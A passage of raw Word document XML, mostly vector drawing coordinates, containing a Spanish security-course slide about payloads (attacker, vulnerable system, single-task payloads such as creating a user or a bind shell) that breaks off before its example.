                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341104" y="130952"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3365979" y="129286"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3335782" y="129286"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336155" y="129452"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336797" y="129666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336634" y="129666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340688" y="131478"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340025" y="130952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3341104" y="130952"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3340735" y="130048"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3368022" y="130048"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3367000" y="129666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336797" y="129666"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336226" y="129452"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3366426" y="129452"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3365979" y="129286"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3288892" y="118500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3305821" y="121474"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3306160" y="121618"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3318519" y="124307"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3319710" y="124587"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3328924" y="127000"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3328796" y="127000"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3336155" y="129452"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3335782" y="129286"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3365979" y="129286"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3364957" y="128904"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3364611" y="128904"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3363755" y="128456"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3360586" y="128456"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3358007" y="124587"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359069" y="124587"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3357117" y="120141"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3355545" y="118915"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3291473" y="118915"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3288892" y="118500"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3363755" y="128456"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3364611" y="128904"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3364957" y="128904"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3363755" y="128456"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3358007" y="124587"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3360586" y="128456"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359866" y="126581"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359643" y="126380"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359327" y="126147"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3358007" y="124587"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359918" y="126581"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3360023" y="127000"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3360569" y="128456"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3363755" y="128456"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3361943" y="127508"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3361182" y="127508"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359918" y="126581"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359790" y="126380"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3359918" y="126581"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3361182" y="127508"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3360174" y="126581"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359790" y="126380"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3360174" y="126581"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3361182" y="127508"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3361943" y="127508"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3360174" y="126581"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359347" y="126147"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3359918" y="126581"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359790" y="126380"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359347" y="126147"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3359790" y="126380"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3360174" y="126581"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3359347" y="126147"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359790" y="126380"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3359069" y="124587"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3358007" y="124587"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359703" y="126147"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359403" y="125349"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3359069" y="124587"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3304252" y="121199"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3306173" y="121618"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3305821" y="121474"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3304252" y="121199"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3272512" y="115866"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3291473" y="118915"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3355545" y="118915"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3351958" y="116117"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3274351" y="116117"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3272512" y="115866"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3231378" y="110400"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3274351" y="116117"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3351958" y="116117"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3350767" y="115188"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3343274" y="111760"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3339943" y="110649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3233580" y="110649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3231378" y="110400"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="0" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="19050"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1376044" y="31876"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2531585" y="65277"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2531346" y="65277"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2868167" y="81787"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3096892" y="97282"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3096731" y="97282"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3183890" y="105155"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3233580" y="110649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3339943" y="110649"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3334131" y="108712"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3294252" y="100075"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3235451" y="91693"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3185921" y="86233"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3096894" y="78232"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2869183" y="62737"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="2303906" y="37337"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1082039" y="7874"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="286385">
                              <a:moveTo>
                                <a:pt x="3096743" y="97282"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="3095370" y="97282"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3119440" y="99203"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="3096743" y="9728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F7AC63" id="Graphic 92" o:spid="_x0000_s1026" style="position:absolute;margin-left:267.65pt;margin-top:10pt;width:498.65pt;height:22.55pt;z-index:-15715328;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:0;mso-wrap-distance-top:0;mso-wrap-distance-right:0;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:page;mso-position-vertical:absolute;mso-position-vertical-relative:text;v-text-anchor:top" coordsize="633285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" path="m6256527,210185r-5,1651l6256400,248412r-127,37973l6313710,257810r-44610,l6269100,238760r44293,l6256527,210185xem3341767,132334r32876,19812l3415918,160654r81026,11049l3576192,179704r61342,5208l3743102,192786r157321,9651l4282186,220599r825373,24511l6269100,257810r-12731,l6256432,238760r12668,l5107940,226060,4282947,201549,3901566,183514,3671950,168528r-93980,-7746l3523615,155448r-68077,-8097l3455770,147351r-19404,-2699l3419220,141859r-14975,-2723l3403839,139136r-2873,-596l3400241,138408r-9314,-1949l3390631,136459r-10233,-2473l3380265,133986r-727,-256l3343528,133730r-1761,-1396xem6313393,238760r-44293,l6269100,257810r44610,l6332600,248412r-19207,-9652xem3455770,147351r-232,l3458099,147675r-2329,-324xem3400966,138540r2873,596l3404245,139136r-3279,-596xem3389039,136065r1592,394l3390927,136459r-1888,-394xem3379563,133730r702,256l3380395,133986r-832,-256xem3340735,130048r726,1775l3341750,131952r-236,l3341767,132334r1761,1396l3342180,131952r-430,l3341535,131823r547,l3340735,130048xem3368022,130048r-27287,l3343528,133730r36038,l3370502,130952r-2480,-904xem3340688,131478r1079,856l3341514,131952r-53,-129l3340688,131478xem3340082,130952r176,184l3340688,131478r773,345l3340959,131478r-877,-526xem3341104,130952r-1022,l3341535,131823r-215,-345l3341180,131136r-76,-184xem3365979,129286r-30197,l3336155,129452r642,214l3336634,129666r4054,1812l3340025,130952r1079,l3340735,130048r27287,l3367000,129666r-30203,l3336226,129452r30200,l3365979,129286xem3288892,118500r16929,2974l3306160,121618r12359,2689l3319710,124587r9214,2413l3328796,127000r7359,2452l3335782,129286r30197,l3364957,128904r-346,l3363755,128456r-3169,l3358007,124587r1062,l3357117,120141r-1572,-1226l3291473,118915r-2581,-415xem3363755,128456r856,448l3364957,128904r-1202,-448xem3358007,124587r2579,3869l3359866,126581r-223,-201l3359327,126147r376,l3358007,124587xem3359918,126581r105,419l3360569,128456r3186,l3361943,127508r-761,l3359918,126581xem3359790,126380r128,201l3361182,127508r-1008,-927l3359790,126380xem3360174,126581r1008,927l3361943,127508r-1769,-927xem3359347,126147r571,434l3359790,126380r-443,-233xem3359703,126147r87,233l3360174,126581r-471,-434xem3359703,126147r-356,l3359790,126380r-87,-233xem3359069,124587r-1062,l3359703,126147r-300,-798l3359069,124587xem3304252,121199r1921,419l3305821,121474r-1569,-275xem3272512,115866r18961,3049l3355545,118915r-3587,-2798l3274351,116117r-1839,-251xem3231378,110400r42973,5717l3351958,116117r-1191,-929l3343274,111760r-3331,-1111l3233580,110649r-2202,-249xem,l,19050,1376044,31876,2531585,65277r-239,l2868167,81787r228725,15495l3096731,97282r87159,7873l3233580,110649r106363,l3334131,108712r-39879,-8637l3235451,91693r-49530,-5460l3096894,78232,2869183,62737,2303906,37337,1082039,7874,,xem3096743,97282r-1373,l3119440,99203r-22697,-1921xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="72535524" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01F6472F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60158859" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="351CB9F8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="116"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487601664" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2AA1C089" wp14:editId="1A641A6B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3399282</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>244080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6332855" cy="7620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76200"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst/>
                          <a:ahLst/>
                          <a:cxnLst/>
                          <a:rect l="l" t="t" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="6332855" h="76200">
                              <a:moveTo>
                                <a:pt x="76200" y="0"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="38100"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="76200"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="63500" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="63500" y="28575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="28575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="0"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="76200">
                              <a:moveTo>
                                <a:pt x="76200" y="28575"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="63500" y="28575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="63500" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="28575"/>
                              </a:lnTo>
                              <a:close/>
                            </a:path>
                            <a:path w="6332855" h="76200">
                              <a:moveTo>
                                <a:pt x="6332600" y="28575"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="76200" y="28575"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="76200" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6332600" y="47625"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="6332600" y="285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24C951" id="Graphic 93" o:spid="_x0000_s1026" style="position:absolute;margin-left:267.65pt;margin-top:19.2pt;width:498.6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633285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" path="m76200,l,38100,76200,76200r,-28575l63500,47625r,-19050l76200,28575,76200,xem76200,28575r-12700,l63500,47625r12700,l76200,28575xem6332600,28575r-6256400,l76200,47625r6256400,l6332600,28575xe" fillcolor="black" stroked="f">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A171E56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="345" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="9231" w:right="5663" w:hanging="1388"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Transferencia de datos, instalación de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>más</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>herramientas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>maliciosas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53F38868" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="201"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40C4DC57" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="560" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B45D849" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="288"/>
        <w:ind w:left="2565"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Asaltante</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21874AD4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="27"/>
        <w:ind w:left="2565"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="column"/>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Sistema vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4E667A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:type w:val="continuous"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="560" w:right="0" w:bottom="480" w:left="0" w:header="0" w:footer="293" w:gutter="0"/>
          <w:cols w:num="2" w:space="720" w:equalWidth="0">
            <w:col w:w="3857" w:space="8910"/>
            <w:col w:w="6433"/>
          </w:cols>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00BE50C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo6"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1013"/>
        </w:tabs>
        <w:spacing w:before="54"/>
        <w:ind w:left="1013" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Individuales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202CCE50" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="89" w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1734" w:right="854" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>− Estas son cargas útiles autónomas asignadas para realizar una tarea específica, es decir, crear un usuario o un shell de enlace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F39081" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="52"/>
        <w:ind w:left="1374"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">− </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Ejemplo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
